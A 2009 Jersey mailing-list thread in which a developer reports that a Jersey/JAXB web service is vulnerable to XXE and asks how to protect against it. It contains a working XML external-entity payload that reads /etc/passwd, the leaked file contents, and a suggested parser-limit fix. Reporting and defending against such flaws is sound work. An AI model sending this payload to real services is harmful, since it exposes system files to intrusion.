users@jersey.java.net

Re: [Jersey] Jersey vulnerable to XXE attack?

From: Tim McCune <tim_at_mccune.name>
Date: Mon, 6 Jul 2009 13:25:53 -0700

@Path("/")
public class MovieResource
  ...
  @POST
  @Path("user/{id}/favoriteMovies")
  @Consumes({"application/xml", "application/json"})
  public FavoriteMovie addFavoriteMovie(@PathParam("id") Long id,
FavoriteMovie movie) {
     return movie;
  }
}

@XmlRootElement
public class FavoriteMovie {
  private String _title;
  public String getTitle() {
    return _title;
  }
  public void setTitle(String title) {
    _title = title;
  }
}

If I POST the following XML:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<favoriteMovie><title>&xxe;</title></favoriteMovie>

I get back:
<favoriteMovie>
  <title>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
  </title>
</favoriteMovie>

Adding a
System.setProperty("entityExpansionLimit", "0");
fixes the problem, and causes this exception instead:
org.xml.sax.SAXParseException: The parser has encountered more than "0"
entity expansions in this document; this is the limit imposed by the
application.

On Mon, Jul 6, 2009 at 1:01 PM, Guba, Nicolai <nguba_at_bioware.com> wrote:

> I could not reproduce it. The JAXB serializer (correctly) identified
> this as an invalid request.
>
>
>
> Maybe it works with resources that are processing form parameters? It may
> be helpful to see the code snipped of the resource you are accessing.
>
>
>
>
>
> --
>
> =NPG=
>
> *From:* ksuwildcat_at_gmail.com [mailto:ksuwildcat_at_gmail.com] *On Behalf Of *Tim
> McCune
> *Sent:* Monday, July 06, 2009 1:04 PM
> *To:* users_at_jersey.dev.java.net
> *Subject:* [Jersey] Jersey vulnerable to XXE attack?
>
>
>
> http://www.securiteam.com/securitynews/6D0100A5PU.html
>
> Just tried this attack against a simple web service built on top of Jersey,
> and it seems to have succeeded.
>
> <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
> <foo><bar>&xxe;</bar></foo>
>
> If I POST that to a web service built on Jersey, and have my resource just
> return the parameter that was passed into it, I can see the contents of
> /etc/passwd.
>
> Can anyone confirm that this vulnerability exists, and if so, advise on the
> best way to protect against it?
>
© Oracle | By contributing to this project, you are agreeing to the terms of use described here.